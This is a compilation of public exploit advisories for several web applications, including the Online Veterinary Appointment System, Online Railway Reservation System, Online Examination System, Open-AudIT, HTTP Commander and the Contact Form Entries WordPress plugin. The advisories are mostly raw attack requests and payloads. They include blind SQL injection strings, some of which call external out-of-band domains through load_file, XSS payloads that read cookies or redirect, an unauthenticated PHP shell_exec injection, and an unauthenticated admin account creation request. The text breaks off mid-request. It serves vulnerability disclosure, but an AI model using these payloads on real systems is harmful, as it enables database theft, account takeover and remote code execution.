<pre><code># Exploit Title: Online Veterinary Appointment System 1.0 - 'Multiple' SQL Injection<br /># Date: 05/01/20222<br /># Exploit Author: twseptian<br /># Vendor Homepage: https://www.sourcecodester.com/php/15119/online-veterinary-appointment-system-using-phpoop-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/ovas.zip<br /># Version: v1.0<br /># Tested on: Kali Linux 2021.4<br /><br />=====================================================================================================================================<br />SQL Injection:<br />=====================================================================================================================================<br />SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Online Veterinary Appointment System 1.0 is vulnerable to 'Multiple' SQL injections.<br /><br />=====================================================================================================================================<br />Attack Vector:<br />=====================================================================================================================================<br />An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap.<br /><br />=====================================================================================================================================<br />1. Appointment Requests - Vulnerable Parameter(s): id<br />=====================================================================================================================================<br />Steps of reproduce:<br />Step-1: On the dashboard navigate to 'Appointment Requests' page using the following URL:<br /><br />http://localhost/ovas/admin/?page=appointments<br /><br />then go to 'Action' > 'View'.<br /><br />Step-2: Put the SQL Injection payloads in 'id' field.<br />time-based blind payload : page=appointments/view_details&id=1' AND (SELECT 2197 FROM (SELECT(SLEEP(5)))DZwi) AND 'mQQq'='mQQq<br /><br />Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.<br /><br />=====================================================================================================================================<br />2. Inquiries - Vulnerable Parameter(s): id<br />=====================================================================================================================================<br />Steps of reproduce:<br />Step-1: On the dashboard navigate to 'Inquiries' page using the following URL:<br /><br />http://localhost/ovas/admin/?page=inquiries<br /><br />then go to 'Action' > 'View'.<br /><br />Step-2: Let's intercept 'View' request using burpsuite: <br /><br />GET /ovas/admin/inquiries/view_details.php?id=1 HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Connection: close<br />Referer: http://localhost/ovas/admin/?page=inquiries<br />Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />Put the SQL Injection payloads in 'id' field.<br />time-based blind payload : /ovas/admin/inquiries/view_details.php?id=1' AND (SELECT 6051 FROM (SELECT(SLEEP(5)))DEds) AND 'SOxP'='SOxP<br /><br />Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.<br /><br />=====================================================================================================================================<br />3. My Account - Vulnerable Parameter(s): id,firstname,lastname,username<br />=====================================================================================================================================<br />Steps of reproduce:<br />Step-1: On the dashboard navigate to 'My Account' page using the following URL:<br /><br />http://localhost/ovas/admin/?page=user<br /><br />Step-2: then let's intercept 'Update' request using burpsuite: <br /><br />POST /ovas/classes/Users.php?f=save HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------24959341351495697487735843118<br />Content-Length: 796<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/ovas/admin/?page=user<br />Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="id"<br /><br />4<br />-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="firstname"<br /><br />user<br />-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="lastname"<br /><br />user<br />-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="username"<br /><br />user<br />-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="password"<br /><br /><br />-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------24959341351495697487735843118--<br /><br />Put the SQL Injection payloads in Vulnerable Parameter(s): id,firstname,lastname,username<br />for example, the time-based blind payload in 'id': <br /><br />[SNIP]<br />Content-Disposition: form-data; name="id"<br /><br />4 AND (SELECT 9713 FROM (SELECT(SLEEP(5)))YIam)<br />-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="firstname"<br /><br />user<br />-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="lastname"<br /><br />user<br />-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="username"<br /><br />user<br />-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="password"<br /><br /><br />-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------24959341351495697487735843118--<br /><br />Step-3: If we use BurpSuite, click 'Send'. The server target accepted our payload, and the response got delayed by 5 seconds. The same thing for other parameters<br /><br />=====================================================================================================================================<br />4. Category List - Vulnerable Parameter(s): id<br />=====================================================================================================================================<br />Steps of reproduce:<br />Step-1: On the dashboard navigate to 'Category List ' page using the following URL:<br /><br />http://localhost/ovas/admin/?page=categories<br /><br />then go to 'Action' > 'Edit' <br /><br />Step-2: Let's intercept 'Edit' request using burpsuite: <br /><br />GET /ovas/admin/categories/manage_category.php?id=2 HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Connection: close<br />Referer: http://localhost/ovas/admin/?page=categories<br />Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />Put the SQL Injection payloads in 'id' field.<br />time-based blind payload : /ovas/admin/categories/manage_category.php?id=2' AND (SELECT 3851 FROM (SELECT(SLEEP(5)))UFXk) AND 'XbFb'='XbFb<br /><br />Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.<br /><br />=====================================================================================================================================<br />5. Service List - Vulnerable Parameter(s): id<br />=====================================================================================================================================<br />Steps of reproduce:<br />Step-1: On the dashboard navigate to 'Service List ' page using the following URL:<br /><br />http://localhost/ovas/admin/?page=services<br /><br />then go to 'Action' > 'View' <br /><br />Step-2: Let's intercept 'View' request using burpsuite: <br /><br />GET /ovas/admin/services/view_service.php?id=4 HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Connection: close<br />Referer: http://localhost/ovas/admin/?page=services<br />Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />Put the SQL Injection payloads in 'id' field.<br />time-based blind payload : /ovas/admin/services/view_service.php?id=4' AND (SELECT 5507 FROM (SELECT(SLEEP(5)))kAsY) AND 'UrUQ'='UrUQ<br /><br />Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.<br /><br />=====================================================================================================================================<br />6. Admin User List - Vulnerable Parameter(s): id<br />=====================================================================================================================================<br />Steps of reproduce:<br />Step-1: On the dashboard navigate to 'Admin User List ' page using the following URL:<br /><br />http://localhost/ovas/admin/?page=user/list<br /><br />then go to 'Action' > 'Edit' <br /><br />Step-2: Let's intercept 'Edit' request using burpsuite: <br /><br />GET /ovas/admin/?page=user/manage_user&id=3 HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Referer: http://localhost/ovas/admin/?page=user/list<br />Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />Put the SQL Injection payloads in 'id' field.<br />time-based blind payload : /ovas/admin/services/view_service.php?id=4' AND (SELECT 5507 FROM (SELECT(SLEEP(5)))kAsY) AND 'UrUQ'='UrUQ<br /><br />Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.<br /></code></pre>
<pre><code># Exploit Title: Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated)<br /># Date: 01/11/2021<br /># Exploit Author: Dominic Clark (parzival)<br /># Vendor Homepage: https://opmantek.com/<br /># Software Link: https://www.open-audit.org/downloads.php<br /># Category: WebApps<br /># Version: <= 4.2.0<br /># Tested on: Windows 10<br /># CVE: CVE-2021-44916<br /><br /># 1. Vendor Description<br /># Open-AudIT is an application to tell you exactly what is on your network, how it is configured and when it changes.<br /># Essentially, Open-AudIT is a database of information, that can be queried via a web interface.<br /># Open-AudIT will run on both Windows and Linux systems. <br /><br /># 2. Technical Description<br /># There is an issue with link creation in the GUI with Open-AudIT Community.<br /># If a bad value is passed to the routine via a URL, javascript code can be executed.<br /># This requires the user be logged in to Open-AudIT Community to trigger.<br /><br /># 3. Proof of Concept<br /># Step 1: Login to Open-AudIT via the login page (default credentials are admin/password)<br /># Step 2: Enter one of the following PoC URLs, this issue was observed to occur any time there is a file available to be imported: (e.g., http://localhost/open-audit/index.php/attributes/import)<br /><br />Vulnerable URL 1: "http://localhost/open-audit/index.php/discoveries/import%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22"<br />Vulnerable URL 2: "http://localhost/open-audit/index.php/credentials/import%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22"<br /><br /># Step 3: Observe that the payload successfully executes and a popup is displayed. <br /># This vulnerability can be exploited in conjuction with a social engineering attack to potentially obtain sensitive information such a users session cookie.<br /><br /># 4. Remediation<br /># Apply the recommended workarounds and mitigations provided by Opmantek.<br /># https://community.opmantek.com/display/OA/Errata+-+4.2.0+and+earlier+Javascript+vulnerability<br /><br /></code></pre>
<pre><code># Exploit Title: Contact Form Entries < 1.1.7 - Unauthenticated Stored Cross-Site Scripting. <br /># Date: 22/12/2021<br /># Exploit Author: gx1 <gaetano.perrone[at]secsi.io><br /># Vulnerability Discovery: Gaetano Perrone (aka gx1)<br /># Vendor Homepage: https://www.crmperks.com/<br /># Software Link: https://wordpress.org/plugins/contact-form-entries/<br /># Version: < 1.2.4<br /># Tested on: any<br /># CVE : CVE-2021-25079<br /><br /><br /><br /># References: <br />* https://wpscan.com/vulnerability/c3d49271-9656-4428-8357-0d1d77b7fc63<br />* https://secsi.io/blog/cve-2021-25079-multiple-reflected-xss-in-contact-form-entries-plugin/<br /><br /># Description: <br />Several params of vxcf_leads administrator page are vulnerable to a Reflected Cross-Site-Scripting vulnerability.<br /><br /><br /><br /><br /><br /># Proof Of Concept: <br /><br />The following request:<br />---------------------------------------------------------------------------------------------------------------------------------------<br /><br />GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+<br /><br />---------------------------------------------------------------------------------------------------------------------------------------<br /><br />returns the list of saved entries in the database.<br />form_id value is reflected in <input> tag. <br />form_id parameter is not sanitized, so it is possible to inject arbitrary values.<br /><br />The following request:<br /><br />---------------------------------------------------------------------------------------------------------------------------------------<br />http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5e1kpc%22+onmouseover%3Dalert%281%29+ne97l&status&tab=entries&search&order=desc&orderby=fir+ <br />---------------------------------------------------------------------------------------------------------------------------------------<br /><br />Allows to inject onmouseover inside the input form. <br />----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><input class="hide-column-tog" name="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" type="checkbox" id="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" value="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl" checked='checked' />Source</label><label><br />----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /><br />By moving the mouse inside the click element, the vulnerability is triggered. Even if the vulnerability seems to require the user to move the mouse on the input element, it is possible to improve the attack by just injecting a “style” section that expands the input element with large width and height. In this way, when the user clicks on the link, javascript code is executed. <br /><br />status param is vulnerable to most dangerous XSS attack: just sending the following request <br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=b9zrb--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eg482f&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date <br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br />will execute XSS vulnerability. <br /><br />order, orderby and search parameters are also vulnerable to XSS:<br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir%20ihj17%22accesskey%3d%22x%22onclick%3d%22alert(1)%22%2f%2fv9tdt<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /><br /><br /># Solution: <br />Upgrade Contact Form Entries to version 1.2.4<br /></code></pre>
<pre><code># Exploit Title: HTTP Commander 3.1.9 - Stored Cross Site Scripting (XSS)<br /># Date: 07/01/2022<br /># Exploit Author: Oscar Sandén<br /># Vendor Homepage: https://www.element-it.com<br /># Software Link: https://www.element-it.com/downloads.aspx<br /># Version: 3.1.9<br /># Tested on: Windows Server 2016<br /><br />[Description]<br />There is a stored XSS in the 'Zip content' feature of the HTTP commander application. The vulnerable field is the filename of the files inside the zip. This vulnerability exists in 3.x of the HTTP commander application.<br /><br />[Steps to reproduce]<br />1) Create a file with a xxs payload in its name. Examples:<br /><img src=x onerror=alert(1)>.txt<br /><img src=x onerror="document.location='https:'+String.fromCharCode(47)+String.fromCharCode(47)+'exploit-db.com'">.txt<br />Or some other JS you like.<br />2) Zip the files<br />3) Upload the ZIP-file<br />4) In HTTP commander, right click the file and select ZIP-content.<br />5) If the files are in a subfolder, expand it until the filenames are shown.<br /><br />[Exploit]<br />touch payload/<img src=x onerror=alert(1)>.txt<br />Zip -r test.zip /payload<br /> <br /></code></pre>
<pre><code>## Title: Online Examination System Project 1.0 SQL - Injections<br />## Author: nu11secur1ty<br />## Date: 01.10.2022<br />## Vendor: https://projectworlds.in/free-projects/php-projects/<br />## Software: https://projectworlds.in/free-projects/php-projects/online-examination/<br /><br />## Description:<br />The eid parameter in `account.php` from Online Examination System 1.0<br />system appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\0jkmt3q30zv5dtuzpbb7tew1fsll9dz1q4ev1npc.tupaka.net\\xxi'))+'<br />was submitted in the eid parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker can take account control of all accounts plus an<br />administrator account on this system.<br />Status: CRITICAL<br /><br />[+] Payload:<br /><br />```mysql<br />---<br />Parameter: eid (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)<br /> Payload: q=quiz&step=2&eid=-2303' OR 9254=9254#&n=2&t=2<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: q=quiz&step=2&eid=558920ff906b8'+(select<br />load_file('\\\\0jkmt3q30zv5dtuzpbb7tew1fsll9dz1q4ev1npc.tupaka.net\\xxi'))+''<br />OR (SELECT 8851 FROM(SELECT COUNT(*),CONCAT(0x71627a7171,(SELECT<br />(ELT(8851=8851,1))),0x7162766271,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- enxi&n=2&t=2<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: q=quiz&step=2&eid=558920ff906b8'+(select<br />load_file('\\\\0jkmt3q30zv5dtuzpbb7tew1fsll9dz1q4ev1npc.tupaka.net\\xxi'))+''<br />AND (SELECT 2169 FROM (SELECT(SLEEP(3)))vUQa)-- mkFM&n=2&t=2<br />---<br />- admin PWNED:<br /><br />---<br />Parameter: eid (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)<br /> Payload: q=quiz&step=2&eid=-3444' OR 9185=9185#&n=2&t=2<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: q=quiz&step=2&eid=558920ff906b8'+(select<br />load_file('\\\\0jkmt3q30zv5dtuzpbb7tew1fsll9dz1q4ev1npc.tupaka.net\\xxi'))+''<br />OR (SELECT 8668 FROM(SELECT COUNT(*),CONCAT(0x716b7a6271,(SELECT<br />(ELT(8668=8668,1))),0x716a6a7871,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- STVX&n=2&t=2<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: q=quiz&step=2&eid=558920ff906b8'+(select<br />load_file('\\\\0jkmt3q30zv5dtuzpbb7tew1fsll9dz1q4ev1npc.tupaka.net\\xxi'))+''<br />AND (SELECT 4208 FROM (SELECT(SLEEP(3)))GPoO)-- AvEf&n=2&t=2<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/Projectworlds/2022/Online%20Examination%20System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/iigqg0)<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code>## Title: Online Resort Management System 1.0 SQL - Injections<br />## Author: nu11secur1ty<br />## Date: 01.09.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15126/online-resort-management-system-using-phpoop-free-source-code.html<br /><br />## Description:<br />The id parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\g5m5022yoztcb375vu5zomhbn2tvhl5c80znqbf.chushkopeks.net\\qru'))+'<br />was submitted in the id parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker can take account control of all accounts plus an<br />administrator account on this system.<br />Status: CRITICAL<br /><br />[+] Payload:<br /><br />```mysql<br />---<br />Parameter: id (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=view_room&id=5'+(select<br />load_file('\\\\g5m5022yoztcb375vu5zomhbn2tvhl5c80znqbf.chushkopek.net\\qru'))+''<br />AND (SELECT 7995 FROM (SELECT(SLEEP(3)))MQXi) AND 'RNQM'='RNQM<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Online-Resort-Management-System-1.0)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/524sxp)<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code># Exploit Title: Online Railway Reservation System 1.0 - 'id' SQL Injection (Unauthenticated)<br /># Date: 07/01/2022<br /># Exploit Author: twseptian<br /># Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip<br /># Version: v1.0<br /># Tested on: Kali Linux 2021.4,PHP 7.4.26<br /><br />*SQL Injection*<br />SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to it's database. Online Railway Reservation System v1.0 is vulnerable to SQL injection via the 'id' parameter on the Reservation Form.<br /><br />*Attack Vector*<br />An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap.<br /><br />*Steps of reproduce:*<br />Step-1: Navigate to 'Schedule' > go to 'Book' or 'Revervation Form' page using the following URL: <br />http://localhost/orrs/?page=reserve&sid=1<br /><br />Step-2: Put the SQL Injection payloads in 'id' field.<br />In this we used time-based blind payload: /orrs/?page=reserve&sid=1') AND (SELECT 6842 FROM (SELECT(SLEEP(5)))UsWr) AND ('WBCm'='WBCm<br /><br />Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.<br /></code></pre>
<pre><code>#Exploit Title: Online Railway Reservation System 1.0 - Remote Code Execution (RCE) (Unauthenticated)<br />#Date: 07/01/2022<br />#Exploit Author: Zachary Asher<br />#Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html<br />#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip<br />#Version: 1.0<br />#Tested on: Online Railway Reservation System 1.0<br /><br />=====================================================================================================================================<br />Command Execution<br />=====================================================================================================================================<br />POST /orrs/classes/SystemSettings.php?f=update_settings HTTP/1.1<br />Host: localhost<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------41914587873111789572282654447<br />Content-Length: 164<br /><br />-----------------------------41914587873111789572282654447<br />Content-Disposition: form-data; name="content[welcome]"<br /><?php echo shell_exec('id -a'); ?><br /><br />=====================================================================================================================================<br />View Output<br />=====================================================================================================================================<br />GET /orrs/ HTTP/1.1<br />Host: localhost<br />Content-Length: 2<br /><br />=====================================================================================================================================<br />View Only STDOUT<br />=====================================================================================================================================<br />curl -i -s -k -X $'GET' \<br /> -H $'Host: localhost' -H $'Content-Length: 2' \<br /> --data-binary $'\x0d\x0a' \<br /> $'http://localhost/orrs/'| sed -n '/\"welcome-content\"/,/<\/div/p' | grep -v '<'<br /></code></pre>
<pre><code>#Exploit Title: Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated)<br />#Date: 07/01/2022<br />#Exploit Author: Zachary Asher<br />#Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html<br />#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip<br />#Version: 1.0<br />#Tested on: Online Railway Reservation System 1.0<br /><br />=====================================================================================================================================<br />Account Creation<br />=====================================================================================================================================<br />POST /orrs/classes/Users.php?f=save HTTP/1.1<br />Host: localhost<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------344736580936503100812880815036<br />Content-Length: 602<br /><br />-----------------------------344736580936503100812880815036<br />Content-Disposition: form-data; name="firstname"<br /><br />testing<br />-----------------------------344736580936503100812880815036<br />Content-Disposition: form-data; name="lastname"<br /><br />testing<br />-----------------------------344736580936503100812880815036<br />Content-Disposition: form-data; name="username"<br /><br />testing<br />-----------------------------344736580936503100812880815036<br />Content-Disposition: form-data; name="password"<br /><br />testing<br />-----------------------------344736580936503100812880815036<br />Content-Disposition: form-data; name="type"<br /><br />1<br /></code></pre>
<pre><code>#Exploit Title: Online Railway Reservation System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS) (Unauthenticated)<br />#Date: 07/01/2022<br />#Exploit Author: Zachary Asher<br />#Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html<br />#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip<br />#Version: 1.0<br />#Tested on: Online Railway Reservation System 1.0<br /><br />1)<br />=====================================================================================================================================<br />To Store XSS (about_us)<br />=====================================================================================================================================<br />POST /orrs/classes/SystemSettings.php?f=update_settings HTTP/1.1<br />Host: localhost<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------41914587873111789572282654447<br />Content-Length: 159<br /><br />-----------------------------41914587873111789572282654447<br />Content-Disposition: form-data; name="content[about_us]"<br /><br /><svg/onload=alert(document.cookie)><br /><br />=====================================================================================================================================<br />To Trigger Stored XSS (about_us)<br />=====================================================================================================================================<br />Browse to http://<ip>/orrs/?page=about<br /><br /><br />2)<br />=====================================================================================================================================<br />To Store XSS (train code)<br />=====================================================================================================================================<br />POST /orrs/classes/Master.php?f=save_train HTTP/1.1<br />Host: localhost<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------271324269624375374252271437649<br />Content-Length: 254<br /><br />-----------------------------271324269624375374252271437649<br />Content-Disposition: form-data; name="id"<br /><br />1<br 